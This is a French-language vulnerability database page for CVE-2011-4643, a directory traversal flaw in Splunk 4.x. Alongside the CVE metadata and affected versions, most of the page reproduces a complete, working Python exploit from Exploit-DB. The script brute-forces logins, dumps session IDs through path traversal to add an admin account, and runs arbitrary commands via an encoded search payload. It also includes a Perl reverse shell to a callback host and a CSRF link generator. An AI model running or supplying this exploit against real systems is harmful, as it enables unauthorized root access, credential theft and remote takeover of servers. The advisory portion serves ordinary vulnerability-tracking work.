CVE-2011-4643 : Détail


Directory Traversal
A01-Broken Access Control
10h00 +00:00
10h57 +00:00
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Descriptions du CVE

Multiple directory traversal vulnerabilities in Splunk 4.x before 4.2.5 allow remote authenticated users to read arbitrary files via a .. (dot dot) in a URI to (1) Splunk Web or (2) the Splunkd HTTP Server, aka SPL-45243.

Informations du CVE

Faiblesses connexes

CWE-ID Nom de la faiblesse Source
CWE-22 Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')
The product uses external input to construct a pathname that is intended to identify a file or directory that is located underneath a restricted parent directory, but the product does not properly neutralize special elements within the pathname that can cause the pathname to resolve to a location that is outside of the restricted directory.


Métriques Score Gravité CVSS Vecteur Source
V2 4 AV:N/AC:L/Au:S/C:P/I:N/A:N [email protected]


EPSS est un modèle de notation qui prédit la probabilité qu'une vulnérabilité soit exploitée.

Score EPSS

Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.

Percentile EPSS

Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.

Informations sur l'Exploit

Exploit Database EDB-ID : 18245

Date de publication : 2011-12-14 23h00 +00:00
Auteur : Gary O'Leary-Steele
EDB Vérifié : Yes

from sec1httplib.requestbuilder import Requestobj from sec1httplib.thread_dispatcher import * import threading import re import urlparse import sys import urllib import base64 from optparse import OptionParser import sys """ Source: Splunk remote root exploit. Author: Gary O'leary-Steele @ Sec-1 Ltd Date: 5th September 2011 Release date: Private Full Package: C:\git\splunk>python -h Usage: Run -h to see usage options Options: --version show program's version number and exit -h, --help show this help message and exit -t TARGETHOST IP Address or hostname of target splunk server -c Generate CSRF URL only -w SPLUNKWEB_PORT The Splunk admin interface port (Default: 8000) -d SPLUNKD_PORT The Splunkd Web API port (Default: 8089) -u USERFILE File containing usernames for use in dictionary attack -p PASSFILE File containing passwords for use in dictionary attack -U USERNAME Admin username (if known) -P PASSWORD Admin pasword (if known) ToDo: Fix bug when attemping to get home dir """ #Set this to use a proxy #Requestobj.set_proxy("","8080") Requestobj.verbose = 0 misc_lock = threading.Lock() # Counter used in bruteforce class Counter(): def __init__(self): self.l = threading.Lock() def set_total(self,total): self.statictotal = total = total def sub(self): with self.l: if !=0: = - 1 def print_remaining(self): with self.l: print "[i] %s of %s remaining" % (,self.statictotal) counter = Counter() def request_factory_splunkd(targeturl,username,password,splunk_object): "Factory to generate attempt_login functions" global counter def attempt_login(): # Dont continue if we already have admin if splunk_object.got_admin == 1: return False login_url = "{0}/services/auth/login".format(targeturl.rstrip()) r = Requestobj(login_url) poststr = "username={0}&password={1}".format(username.rstrip(),password.rstrip()) r.rawpostdata("POST", poststr) result = r.makerequest() counter.sub() counter.print_remaining() if result.find_data("Remote login disabled because you are using a free license"): print "[i] Free licence in use. No remote login required" print "[!] run the exploit again with the -f flag" sys.exit() if result.find_data("sessionKey"): print "[***] Cracked: %s:%s\n" % (username.rstrip(),password.rstrip()) try: if splunk_object.user_is_admin(username.rstrip(),password.rstrip()): splunk_object.username = username.rstrip() splunk_object.password = password.rstrip() splunk_object.got_admin =1 #print "ADMIN",splunk_object.got_admin splunk_object.session_key = re.findall("<sessionKey>(.+?)</sessionKey>",result.body)[0] except Exception as err: print "[i] Error getting auth details",err return (username,password) else: pass return attempt_login def request_factory_splunkweb(targeturl,username,password,cval,splunk_object): "Factory to generate attempt_login functions" global counter def attempt_login(): if splunk_object.got_admin == 1: return False login_url = "{0}/en-GB/account/login".format(targeturl.rstrip()) r = Requestobj(login_url) poststr = "cval={0}&return_to=%2Fen-GB%2F&username={1}&password={2}".format(cval,username.rstrip(),password.rstrip()) r.rawpostdata("POST", poststr) r.set_custom_cookie(copyglobaljar=1) result = r.makerequest() counter.sub() counter.print_remaining() if result.find_data("This resource can be found at"): print "[***] Cracked: %s:%s" % (username.rstrip(),password.rstrip()) try: if splunk_object.user_is_admin(username.rstrip(),password.rstrip()): splunk_object.username = username.rstrip() splunk_object.password = password.rstrip() splunk_object.got_admin =1 except Exception as err: print "[i] Error getting auth details",err return (username,password) else: pass return attempt_login class SplunkTarget(object): def __init__(self,hostaddr,splunkd_port=8089,splunkweb_port=8000): self.splunkd_port = splunkd_port self.splunkweb_port = splunkweb_port self.max_threads = 20 self.username="" self.password = "" self.session_key ="" self.splunk_home = "" self.got_admin = 0 self.web_authed = 0 # are we authed to the web interface self.freelic =0 # Check splunkd server info = Requestobj("https://{0}:{1}/services/server/info/server-info".format(hostaddr,splunkd_port)).makerequest() if info.body: self.splunkd_url = "{0}://{1}".format(urlparse.urlparse(info.url).scheme,urlparse.urlparse(info.url).netloc) else: info = Requestobj("http://{0}:{1}/services/server/info/server-info".format(hostaddr,splunkd_port)).makerequest() self.splunkd_url = "{0}://{1}".format(urlparse.urlparse(info.url).scheme,urlparse.urlparse(info.url).netloc) if "server-info" in info.body: self.splunkd =1 try: self.os_build = re.findall("os_build\">(.+?)<",info.body)[0] self.os_name = re.findall("os_name\">(.+?)<",info.body)[0] self.os_version = re.findall("os_version\">(.+?)<",info.body)[0] self.server_name = re.findall("serverName\">(.+?)<",info.body)[0] self.splunk_version = re.findall("\"version\">(.+?)<",info.body)[0] self.cpu_arch = re.findall("cpu_arch\">(.+?)<",info.body)[0] print "[i] Splunkd server found. Version:{0}".format(self.splunk_version) print "[i] OS:{0} {1} {2}".format(self.os_name,self.os_version,self.os_build) except Exception as err: print "Error getting splunk server info",err else: self.splunkd =0 # Check splunk web splunkweb_info = Requestobj("http://{0}:{1}/en-GB/account/login".format(hostaddr,splunkweb_port)).makerequest() if splunkweb_info.body: self.splunkweb_url = "{0}://{1}".format(urlparse.urlparse(splunkweb_info.url).scheme,urlparse.urlparse(splunkweb_info.url).netloc) else: splunkweb_info = Requestobj("https://{0}:{1}/en-GB/account/login".format(hostaddr,splunkweb_port)).makerequest() self.splunkweb_url = "{0}://{1}".format(urlparse.urlparse(splunkweb_info.url).scheme,urlparse.urlparse(splunkweb_info.url).netloc) if "Splunk" in splunkweb_info.body: print "[i] Splunk web interface discovered" self.splunkweb =1 self.cval="" try: self.cval = splunkweb_info.extract_data_body('name="cval" value="(\d+?)"')[0] print "[i] CVAL:{0}".format(self.cval) except: print "[i] Error getting cval" self.splunkweb =0 else: self.splunkweb =0 if self.splunkweb ==1: try: url ="{0}/en-GB/manager/system/licensing".format(self.splunkweb_url) lic = Requestobj(url).makerequest() if "<h1>Free license group</h1>" in lic.body: print "[i] Configured with free licence. No auth required" #if not self.splunkd: # print "[i] Cannot connect to splunkd using free licence" # sys.exit() self.got_admin=1 self.username="admin" self.password="admin" self.web_authed=1 self.splunkd=0 self.freelic=1 self.pop_shell() except Exception as err: print "error",err exit() def account_bruteforce(self,userfile,passfile): global counter q = ThreadDispatcher(store_return=1,max_threads=self.max_threads) for username in set(open(userfile).readlines()): for password in set(open(passfile).readlines()): if self.splunkd == 1: q.add(request_factory_splunkd(self.splunkd_url,username,password,self)) elif self.splunkweb==1: q.add(request_factory_splunkweb(self.splunkweb_url,username,password,self.cval,self)) else: print "[Error] Not connected" sys.exit() counter.set_total(len(q.call_queue)) q.start() for x in range(q.return_queue._qsize()): username, password = q.return_queue.get(x) username = username.rstrip() password = password.rstrip() print "[***] Cracked: %s:%s" % (username,password) def user_is_admin(self,username,password): if self.splunkd == 1: # attempt to auth via splunkd to get a sessionkey self.username = username self.password = password self.splunkd_auth() url = Requestobj("{0}/services/authentication/httpauth-tokens".format(self.splunkd_url)) url.basic_auth(username,password) context = url.makerequest() if '<title>httpauth-tokens' in context.body: self.got_admin =1 return True else: return False elif self.splunkweb == 1: with misc_lock: self.username = username self.password = password if self.splunkweb_auth(): admin_only = Requestobj("{0}/en-US/manager/launcher/server/settings/settings?action=edit".format(self.splunkweb_url)).makerequest() if admin_only.find_data("Port that Splunk Web uses"): print "[i] User:{0} IS AN ADMIN.".format(username) return True else: print "[i] User:{0} is not an admin".format(username) else: pass else: print "Not Connected" return False def search_payload_cmd(self,payload): "Generate a command execution payload" encoded = urllib.quote(base64.b64encode(payload)) encodedpl = """search index=_internal source=*splunkd.log |mappy x=eval("sys.modules['os'].system(base64.b64decode('%s'))")""" % encoded #print encodedpl return encodedpl def get_splunk_home(self): if not self.username or not self.password: print "[i] Valid username and password required" sys.exit() try: r = Requestobj("{0}/services/properties/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fopt%2fsplunk%2fetc%2fsplunk-launch/default/SPLUNK_HOME".format(self.splunkd_url)) r.basic_auth(self.username,self.password) splunkdir = r.makerequest() if "ERROR" not in splunkdir.body and "Remote login disabled" not in splunkdir.body and self.splunkd: self.splunk_home = splunkdir.body.strip() else: print "[***] Could not get home dir setting default.." if "windows" in self.os_name.lower(): self.splunk_home = "c:\\program files\\splunk" else: self.splunk_home = "/opt/splunk" print "Setting Splunk home dir to:{0}".format(self.splunk_home) return self.splunk_home except Exception as err: print "[i] Error occured while attempting to read splunk home dir",err def splunkd_auth(self): login_url = "{0}/services/auth/login".format(self.splunkd_url) r = Requestobj(login_url) poststr = "username={0}&password={1}".format(self.username.rstrip(),self.password.rstrip()) r.rawpostdata("POST", poststr) result = r.makerequest() if result.find_data("Remote login disabled because you are using a free license"): print "[i] Free licence in use. No remote login required" print "[!] run the exploit again with the -f flag" sys.exit() if result.find_data("sessionKey"): self.session_key = re.findall("<sessionKey>(.+?)</sessionKey>",result.body)[0] return True else: return False def splunkweb_auth(self): if self.web_authed == 1: return True login_page = Requestobj("{0}/en-GB/account/login".format(self.splunkweb_url)).makerequest() # Get session cookie cval="" cval = login_page.extract_data_body('name="cval" value="(\d+?)"') if cval: cval = cval[0] r = Requestobj(login_page.url) poststr = "cval={0}&return_to=%2Fen-GB%2F&username={1}&password={2}".format(cval,self.username.rstrip(),self.password.rstrip()) r.rawpostdata("POST", poststr) result = r.makerequest() if result.find_data("This resource can be found at"): return True self.web_authed = 1 else: print "[i] Login Failed" exit() def add_admin(self,username,password,sessionKey): # look for 201 if self.splunkd == 1 and self.username and self.password: url = Requestobj("{0}/servicesNS/-/launcher/authentication/users".format(self.splunkd_url)) url.basic_auth(self.username,self.password) url.rawpostdata("POST","roles=user&roles=admin&name={0}&defaultApp=search&password={1}&email=&createrole=0&realname=".format(username,password)) url.add_header("authorization","Splunk {0}".format(sessionKey)) result = url.makerequest() if str(result.code) == "201": return True else: return False else: print "[!] Not connected to splunkd. Check port and creds" return False def dump_session_ids(self): "Exploits dir traversal issue to dump session ids" print "[i] Attemping to dump sessions" if self.splunkd == 1 and self.username and self.password: #url = Requestobj("{0}/servicesNS/-/system/properties/..%2f..%2f..%2f..%2f..%2fopt%2fsplunk%2fvar%2flog%2fsplunk%2fweb_service.log%00/default".format(self.splunkd_url)) url = Requestobj("{0}/servicesNS/-/system/properties/..%2f..%2f..%2fvar%2flog%2fsplunk%2fweb_service.log%00/default".format(self.splunkd_url)) url.basic_auth(self.username,self.password) result = url.makerequest() sessions=[] if "session=" in result.body: print "[i] Session ID's extracted from web_service.log" sessions = re.findall("session=(.+?)[<\s]",result.body) for session in set(sessions): print "[SESSION]",session return set(sessions) def perl_revshell(self,revhost,port): cmd="""perl -e 'use Socket;$i="%s";$p=%s;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'""" % (revhost,port) self.search_exploit_cmd(cmd) def search_exploit_cmd(self,command): "Execute commands via search exploit." if self.splunkweb == 1 and self.got_admin: if self.web_authed == 0: self.splunkweb_auth() print "[i] Executing Command:{0}".format(command) attack_body = self.search_payload_cmd(command)# attack_body = urllib.quote(urllib.unquote(attack_body)) shell_req = Requestobj("{0}/en-GB/api/search/jobs".format(self.splunkweb_url)) shell_req.rawpostdata("POST","search={0}&status_buckets=300&namespace=search&ui_dispatch_app=search&ui_dispatch_view=flashtimeline&auto_cancel=100&required_field_list=*&earliest_time=&latest_time=".format(attack_body)) for c in shell_req.get_cookiejar(): if "session" in shell_req.add_header("X-Requested-With","XMLHttpRequest") shell_req.add_header("X-Splunk-Session",c.value) x = shell_req.makerequest() elif self.splunkd == 1 and self.got_admin and self.session_key: print "[i] Executing Command:{0}".format(command) attack_body = self.search_payload_cmd(command)# attack_body = urllib.quote(urllib.unquote(attack_body)) shell_req = Requestobj("{0}/servicesNS/admin/search/search/jobs".format(self.splunkd_url)) shell_req.rawpostdata("POST","ui_dispatch_app=search&search={0}&required_field_list=%2A&ui_dispatch_view=flashtimeline&max_count=10000&time_format=%25s.%25Q&latest_time=&status_buckets=300&earliest_time=&auto_cancel=100".format(attack_body)) shell_req.add_header("authorization","Splunk {0}".format(self.session_key)) x = shell_req.makerequest() else: print "Session",self.session_key print "Admin",self.got_admin print "Splunkd",self.splunkd print "[i] Exploit failed. Not connected or access denied" def blind_shell(self): command="" while 1: print command.rstrip() command=raw_input("blind_shell>")# if command.rstrip() == "exit": break self.search_exploit_cmd(command) def get_csrf_link_cmd(self,command): return "{0}/en-US/app/search/flashtimeline?q={1}&earliest=0".format(self.splunkweb_url,self.search_payload_cmd(command)) def get_csrf_link_revshell(self,revhost,port): cmd="""perl -e 'use Socket;$i="%s";$p=%s;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'""" % (revhost,port) return "{0}/en-US/app/search/flashtimeline?q={1}&earliest=0".format(self.splunkweb_url,self.search_payload_cmd(cmd)) def search_exploit_psudoshell(self): "Execute commands via search exploit. Payload implements a virtual shell" if not self.username or not self.password: print "[i] Valid username and password required" sys.exit() if not self.splunkweb == 1: print "[error] Managment Web Interface required for this payload" return "" if self.web_authed == 0: self.splunkweb_auth() base_dir = self.get_splunk_home() #if not base_dir: # print "Failed to get splunk basedir" # base_dir = "/opt/splunk" command="" while 1: print command.rstrip() command=raw_input("shell>")# if command.rstrip() == "exit": break if "windows" in self.os_name.lower(): tmp = ">\"{0}\\share\splunk\search_mrsparkle\exposed\js\.tmp\"".format(base_dir) command = command + tmp #'"'+ tmp +'"' else: tmp = ">{0}/share/splunk/search_mrsparkle/exposed/js/.tmp".format(base_dir) command = command + tmp attack_body = self.search_payload_cmd(command)# attack_body = urllib.quote(urllib.unquote(attack_body)) psudoshell_req = Requestobj("{0}/en-GB/api/search/jobs".format(self.splunkweb_url)) psudoshell_req.rawpostdata("POST","search={0}&status_buckets=300&namespace=search&ui_dispatch_app=search&ui_dispatch_view=flashtimeline&auto_cancel=100&required_field_list=*&earliest_time=&latest_time=".format(attack_body)) for c in psudoshell_req.get_cookiejar(): if "session" in psudoshell_req.add_header("X-Requested-With","XMLHttpRequest") psudoshell_req.add_header("X-Splunk-Session",c.value) x = psudoshell_req.makerequest() import time time.sleep(3) print Requestobj("{0}/en-US/static/@105575/js/.tmp".format(self.splunkweb_url)).makerequest().body def pop_shell(self): "Prompt for paylod options" "[w00p] We appear to have access. Please select a payload" print "[Payload Options]" if self.splunkweb == 1: print "[1]\tPseudo Interactive Shell" else: print "[DISABLED]\tPseudo Interactive Shell" print "[2]\tPerl Reverse Shell" print "[3]\tCommand Exec (Blind)" option = input("Please select option 1-3:") if option == 1: self.search_exploit_psudoshell() elif option ==2: rev_host = raw_input("Enter Callback Host:") rev_port = raw_input("Enter Callback Port:") self.perl_revshell(rev_host,rev_port) elif option ==3: self.blind_shell() else: print "Invalid option" exit() def main(): banner = "-----==[Slunk Remote Root Exploit]=-----\n" parser = OptionParser(usage="Run %prog -h to see usage options", version="%prog 1.0") parser.add_option("-t", action="store", dest="targethost", help="IP Address or hostname of target splunk server") parser.add_option("-c", action="store_true", # optional because action defaults to "store" dest="csrf", help="Generate CSRF URL only") parser.add_option("-f", action="store_true", # optional because action defaults to "store" dest="free_lic_noauth", help="Target is configured to use a Free licence and does not permit remote auth") parser.add_option("-w", action="store", # optional because action defaults to "store" dest="splunkweb_port", default=8000, help="The Splunk admin interface port (Default: 8000)") parser.add_option("-d", action="store", # optional because action defaults to "store" dest="splunkd_port", default=8089, help="The Splunkd Web API port (Default: 8089)") parser.add_option("-u", action="store", # optional because action defaults to "store" dest="userfile", help="File containing usernames for use in dictionary attack") parser.add_option("-p", action="store", # optional because action defaults to "store" dest="passfile", help="File containing passwords for use in dictionary attack") parser.add_option("-U", action="store", # optional because action defaults to "store" dest="username", help="Admin username (if known)") parser.add_option("-P", action="store", # optional because action defaults to "store" dest="password", help="Admin pasword (if known)") parser.add_option("-e", action="store", # optional because action defaults to "store" dest="userpair", help="Attempt to add admin user via priv up directory traversal magic. Accepts username:password") (options, args) = parser.parse_args() if not options.targethost: parser.error("Target host required") exit() elif options.targethost and options.free_lic_noauth: x = SplunkTarget(options.targethost,splunkweb_port=options.splunkweb_port,splunkd_port=options.splunkd_port) x.username="admin" x.password="admin" x.got_admin=1 x.splunkd = 0 x.pop_shell() elif options.targethost and options.csrf: x = SplunkTarget(options.targethost,splunkweb_port=options.splunkweb_port,splunkd_port=options.splunkd_port) print "[*] Enter command to run or enter 'revshell' for a perl reverse shell:" option = raw_input("cmd>") if option =="revshell": rev_host = raw_input("Enter Callback Host:") rev_port = raw_input("Enter Callback Port:") x.perl_revshell(rev_host,rev_port) print x.get_csrf_link_revshell(rev_host,rev_port) else: print x.get_csrf_link_cmd(option.strip()) elif options.targethost and options.username and options.password and options.userpair: print "[i] Attemping priv up" if ":" in options.userpair: username,password = options.userpair.split(":") else: print "-e requires username password pair in format username:password" x = SplunkTarget(options.targethost,splunkweb_port=options.splunkweb_port,splunkd_port=options.splunkd_port) x.username= options.username x.password = options.password x.splunkd = 1 import time while 1: sessionids= x.dump_session_ids() for session in sessionids: if x.add_admin(username,password,session): print "[i] User Added" exit() time.sleep(2) elif options.targethost and options.username and options.password: print "[i] Using static username and password" x = SplunkTarget(options.targethost,splunkweb_port=options.splunkweb_port,splunkd_port=options.splunkd_port) x.username= options.username x.password = options.password if x.user_is_admin(options.username,options.password): x.pop_shell() elif options.targethost and options.userfile and options.passfile: print "[i] Lauching bruteforce attack" x = SplunkTarget(options.targethost,splunkweb_port=options.splunkweb_port,splunkd_port=options.splunkd_port) x.account_bruteforce(options.userfile,options.passfile) if x.got_admin ==1: x.pop_shell() else: print "Please ensure you have supplied either a username and password or a user and password file to bruteforce" exit() if __name__ == '__main__': main()

Products Mentioned

Configuraton 0

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Splunk>>Splunk >> Version 4.0.8

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Splunk>>Splunk >> Version 4.0.10

Splunk>>Splunk >> Version 4.0.11

Splunk>>Splunk >> Version 4.1

Splunk>>Splunk >> Version 4.1.1

Splunk>>Splunk >> Version 4.1.2

Splunk>>Splunk >> Version 4.1.3

Splunk>>Splunk >> Version 4.1.4

Splunk>>Splunk >> Version 4.1.5

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Splunk>>Splunk >> Version 4.2

Splunk>>Splunk >> Version 4.2.1

Splunk>>Splunk >> Version 4.2.2

Splunk>>Splunk >> Version 4.2.3

Splunk>>Splunk >> Version 4.2.4

Tags : x_refsource_CONFIRM
Tags : vdb-entry, x_refsource_SECTRACK
Tags : x_refsource_MISC
Tags : third-party-advisory, x_refsource_SECUNIA
Tags : exploit, x_refsource_EXPLOIT-DB